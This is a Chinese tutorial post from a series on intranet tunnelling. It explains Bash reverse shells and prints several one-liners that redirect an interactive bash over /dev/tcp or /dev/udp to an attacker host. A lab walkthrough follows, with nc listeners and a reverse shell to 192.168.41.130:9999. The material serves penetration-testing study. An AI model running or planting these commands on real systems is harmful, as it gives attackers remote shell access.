内网隧道代理技术(七)之Bash反弹shell
  TEZNKK3IfmPf 2023年11月12日 57 0

Bash介绍

Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell

Bash 反弹Shell的命令如下:

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

接下来,我们逐步分解,对这些参数进行详细介绍

“bash-i” 是指打开一个交互式的Shell

"&“符号用于区分文件和文件描述符,”>&“符号后面跟文件时,表示将标准输出和标准错误输出重定向至文件,”>&“符号后面跟数字时表示后面的数字是文件描述符,不加”&“符号则会把后面的数字当成文件。数字"0”,“1”,"2"是LinuxShell下的文件描述符, “0”是指标准输入重定向, “1”是指标准输出重定向, “2”是指错误输出重定向。

“/dev"目录下"tcp"和"udp"是Linux中的特殊设备,可用于建立Socket连接,读写这俩文件就相当于是在Socket连接中传输数据。”>&/dev/tcp/攻击机_ip/攻击机端口"则表示将标准输出和标准错误输出重定向到"/dev/tcp/攻击机ip/攻击机端口"文件中,也就是重定向到了攻击机,这时目标机的命令执行结果可以从攻击机看到。"0>&1"或"0>&2"又将标准输入重定向到了标准输出,而标准输出重定向到了攻击机,因此标准输入也就重定向到了攻击机,从而可以通过攻击机输入命令,并且可以看到命令执行结果输出

实验环境介绍

实验拓扑

内网隧道代理技术(七)之Bash反弹shell

机器名称

IP

机器

攻击机器

192.168.41.130

windows

服务器

192.168.41.132

kali

实验复现

攻击机器使用nc执行监听命令

#监听 TCP
nc64.exe -lvvp 9999 
#监听UDP
nc64.exe -lup 9999

内网隧道代理技术(七)之Bash反弹shell

实验服务器执行连接命令

bash -i >&/dev/tcp/192.168.41.130/9999 0>&1

内网隧道代理技术(七)之Bash反弹shell

查看结果,发现我们成功得到目标服务器IP

内网隧道代理技术(七)之Bash反弹shell

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月12日 0

暂无评论

推荐阅读
  TEZNKK3IfmPf   2024年05月31日   51   0   0 linux服务器
  TEZNKK3IfmPf   2024年05月31日   30   0   0 linux服务器centos
  TEZNKK3IfmPf   2024年05月31日   29   0   0 linuxbind
  TEZNKK3IfmPf   2024年05月31日   39   0   0 linuxshell
TEZNKK3IfmPf